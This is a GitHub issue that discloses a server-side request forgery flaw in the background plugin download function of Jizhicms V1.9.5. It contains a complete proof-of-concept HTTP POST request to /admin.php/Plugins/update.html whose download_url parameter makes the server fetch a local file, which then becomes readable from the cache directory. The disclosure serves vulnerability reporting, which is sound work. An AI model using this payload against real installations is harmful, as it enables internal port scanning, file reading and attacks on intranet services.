Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

V1.9.5: SSRF Vulnerability #67

Closed
b1ackc4t opened this issue Mar 18, 2022 · 2 comments
Closed

V1.9.5: SSRF Vulnerability #67

b1ackc4t opened this issue Mar 18, 2022 · 2 comments

Comments

@b1ackc4t
Copy link

b1ackc4t commented Mar 18, 2022

SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks

The vulnerability is located in the background plug-in download function

I start a locally accessible Web service with a flag.php file

image

image

use payload

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.48.135
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.48.135
Referer: http://192.168.48.135//admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=821f3d50fa8cd84139c76be9
Connection: close

action=start-download&filepath=mutisite&download_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php

See the response

image

Browser accesshttp://192.168.48.135/cache/update_mutisite.zip

image

open by notepad

image

As with flag.php, this was read successfully

@Cherry-toto
Copy link
Owner

Cherry-toto commented Mar 18, 2022 via email

@b1ackc4t
Copy link
Author

Ok, understood

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants